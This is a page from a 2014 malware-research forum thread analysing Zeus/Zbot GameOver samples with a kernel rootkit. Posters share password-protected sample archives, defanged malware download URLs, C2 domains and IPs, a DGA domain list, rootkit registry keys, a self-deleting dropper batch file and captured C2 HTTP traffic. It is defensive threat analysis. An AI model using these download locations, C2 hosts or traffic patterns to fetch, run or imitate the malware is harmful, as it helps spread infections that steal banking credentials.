Page 24 of 29

Re: Win32/Zeus (alias Zbot)

PostPosted:Fri Feb 28, 2014 4:06 pm
by Artilllerie
Hello,

I have worked on a new zbot sample with rootkit kernel driver yesterday, It's seem to be the gameover version covered by sophos today :
http://nakedsecurity.sophos.com/2014/02 ... e-rootkit/

Pass : infected

included :
Avis.de.Paiement.ex_ (the dropper)
evedgu.ex_ (the zbot sample)
e37aba293ddb236a.sy_ (the rootkit driver)
dumpinjected (dump of an injected part (writeprocessmemory) targetting explorer.exe)

Re: Win32/Zeus (alias Zbot)

PostPosted:Tue Mar 04, 2014 1:48 am
by sevatar
EK dropped loader earlier today. Downloader attempted to grab these, at least one of which appears to be Zbot.

https://www.virustotal.com/file/d25f1e2 ... 393896773/
https://www.virustotal.com/en/file/e048 ... 393896775/

https://malwr.com/analysis/MDRmODY2MGNh ... UxOWM2YTY/
https://malwr.com/analysis/NTI2MzcxMWZj ... Q5MjJiNTI/

h00p://www.del(.)hr/hooted/dogmatics.exe
h00p://twiliteorchestra(.)org/suharto/stropping.exe

Re: Win32/Zeus (alias Zbot)

PostPosted:Tue Mar 04, 2014 7:57 pm
by Xylitol

Re: Win32/Zeus (alias Zbot)

PostPosted:Wed Mar 05, 2014 3:57 am
by sevatar
low detection malware that appears to be zeus.

https://malwr.com/analysis/YWI5YWJhM2Zi ... I0ZGE0NmY/
https://www.virustotal.com/en/file/ea7f ... 393991596/

callout domains/ip:
xifvsxcwtguwytaypaeqwzh.info
hnbydivjbswpyhrkzinrwtpvgqnb.biz
zhmbmzpwcfyxwoeuhalnjojwg.org
50.116.44.105

Re: Win32/Zeus (alias Zbot)

PostPosted:Thu Mar 13, 2014 4:10 pm
by Xylitol
thread split for doing a dedicated topic to ZeusVM

Re: Win32/Zeus (alias Zbot)

PostPosted:Tue Mar 18, 2014 9:08 am
by unixfreaxjp
Same variant as per posted here: http://www.kernelmode.info/forum/viewto ... 230#p22324

Zeus/P2P Gameover in an attached PE in zip in a spam:
Image
VT: https://www.virustotal.com/en/file/d866 ... /analysis/

The attachement drops these files:
Code: Select all
2014/03/18  08:26   56,832 b5156.sys   a2f2b24bd6fa13095c319f7f61c21d2f
2014/03/18  08:26  611,840 lirea.exe   37cb6bf5bfff4c83558b83b858749299
2014/03/18  08:26      132 ZPE7CDB.bat bd4907c94f562da6084f5c3b9bcfe7c5
b5156.sys is the rootkit hooked to:
Code: Select all
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_B5156\0000\Control
Name: ActiveService	
Type: unicode	
Valu: b5156
VT: https://www.virustotal.com/en/file/f147 ... /analysis/

Usual Auto Gerenerated Batch file:
Code: Select all
@echo off
:d
del "C:\securedoc.exe"
if exist "C:\securedoc.exe" goto d
del /F "%Temp%\ZPE7CDB.bat"
A session of CNC Call back traffic:
Image

Posting this command & receiving response:
Image

Post in Hex:
Image

CNC domain Information:
Code: Select all
aulbbiwslxpvvphxnjij.biz

 ;; QUESTION SECTION:
;aulbbiwslxpvvphxnjij.biz.      IN      A

;; ANSWER SECTION:
aulbbiwslxpvvphxnjij.biz. 1800  IN      A       50.116.4.71

;; AUTHORITY SECTION:
aulbbiwslxpvvphxnjij.biz. 2588  IN      NS      DNS[1-5].REGISTRAR-SERVERS.COM. 
IP info:
Code: Select all
$ echo 50.116.4.71|bash origin.sh
Tue Mar 18 17:22:34 JST 2014|
50.116.4.71|li430-71.members.linode.com.|6939 | 50.116.0.0/20 | 
HURRICANE | US | LINODE.COM | LINODE
A session of UDP/p2p Traffic (usual)
Image

Sample set with one session of CNC traffic + UDP is attached.

#MalwareMustDie!

Re: Win32/Zeus (alias Zbot)

PostPosted:Wed Mar 19, 2014 1:31 am
by unixfreaxjp
Upatre downlods new Zbot/GMO w/rootkit
Spam:
Image
Is Cutwail with this source IP:
Code: Select all
Received: from unknown (HELO 18.98-30-64.static.virginmediabusiness.co.uk) (62.30.98.18)
  by 202.143.83.13 with SMTP; 19 Mar 2014 02:55:40 +0900
Downloading Zbot here:
Image
Header:
Code: Select all
GET /images/TARGT.tp HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: jswcompounding-usa.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 18 Mar 2014 23:59:34 GMT
Content-Length: 483608
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 18 Mar 2014 11:02:34 GMT
Accept-Ranges: bytes
ZZP..q...Z.....+...V2..........etc etc

The whole package, Malware family picture:
Image
Zbot cnc callbacks, same pattern as per previous case here: http://www.kernelmode.info/forum/viewto ... 230#p22467
Image
The text of header CNC calls of Zbot:
Code: Select all
POST /write HTTP/1.1
Host: default
Accept-Encoding:
Connection: close
Content-Length: 326
X-ID: 5555
.&.......q..Zb.tD.,.F.......v1xr.<
\.=..+.,%.8oe.......'...'...R@.NSNhK'A
.<TC.OVF.I]D.:R7sK#BvNRO.O]F.f.........
.......}Y.....!0.@.0.lS.5.g............
...37g?3h.......!...!...
iL1xh..xhv1xhv1xhv1xhv1xhv1xhv1xhk.....
..........j..Nkv1xk9E.9f?xkm.......
...
...lt.rnv=xmv=.io.......'...'...
nv7xow6xnv1.jw7..v#xov7xov7xov7xov7..v# 
Zbot attempt to connect to below malware domains:
Code: Select all
aulbbiwslxpvvphxnjij.biz
aqxoythmntgevmjqsjrugdadhyjn.com
rwinsaewkqkrokrhucofaqwxwkv.ru
tcvkwsbqnjhjobgyttklnfxo.com
xohmozgqxkncqcmljrqsyllkrfy.biz
zxxpvolvljwkeuofkukydiugrwro.org
hgfuzrgylxkllnbkrvorkuox.info
desushrswsiinxwzprvogafml.com
nqocjrqxuknbmbqgkhmtoxpcu.ru
jbdswlfxvctooztvgjfdbquspr.biz
bywcdgijrswmbeulnmjsijcx.info
eqqcdilqbqfxspbecde.org
oozovinytdpbbelsqgsodtsc.net
gmqxkrkeaugifzaurtvhuqcxslr.com
oozovinytdpbbelsqgsodtsc.net
gmqxkrkeaugifzaurtvhuqcxslr.com
ztcpgudtkrwpzjrpcebaoxgp.ru
mptwtibibmrhqtobeizlzzdnfwc.com
xwporinufyfyrgdnvzplrfaofbpf.net

PoC:
Image
It seems like this Zbot want to play DGA, two IP addresses are active now under ENOM domain registration..
Code: Select all
aulbbiwslxpvvphxnjij.biz  50.116.4.71,
xwporinufyfyrgdnvzplrfaofbpf.net 107.158.75.30,
All are in US Network...
Code: Select all
Wed Mar 19 10:54:24 JST 2014|50.116.4.71|li430-71.members.linode.com.|6939 | 50.116.0.0/20 | HURRICANE | US | LINODE.COM | LINODE
Wed Mar 19 10:55:09 JST 2014|107.158.75.30||30693 | 107.158.72.0/22 | SERVERHUB-PHOENIX | US | SERVERHUB.COM | SERVERHUB
Rootkit used: https://www.virustotal.com/en/file/f147 ... 395189543/
Registry hooks:
Code: Select all
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_242B8E047E8C5D29\0000\Control
Name: ActiveService
Type: unicode
data: 242b8e047e8c5d29
Sample is attached w/PCAP.
#MalwareMustDie

Re: Win32/Zeus (alias Zbot)

PostPosted:Wed Mar 19, 2014 5:39 am
by B-boy/StyLe/
Grabbed from an infected PC while cleaning it out.


Regards,
Georgi

Re: Win32/Zeus (alias Zbot)

PostPosted:Wed Mar 19, 2014 11:11 am
by Kimberly
unixfreaxjp wrote:Upatre downlods new Zbot/GMO w/rootkit
It seems like this Zbot want to play DGA, two IP addresses are active now under ENOM domain registration..
What's new about that, GMO always falls back to DGA ...

Re: Win32/Zeus (alias Zbot)

PostPosted:Wed Mar 19, 2014 8:59 pm
by unixfreaxjp
Kimberly wrote:GMO always falls back to DGA ...
Very good then, the post shows a knowhow to extract them actually < the point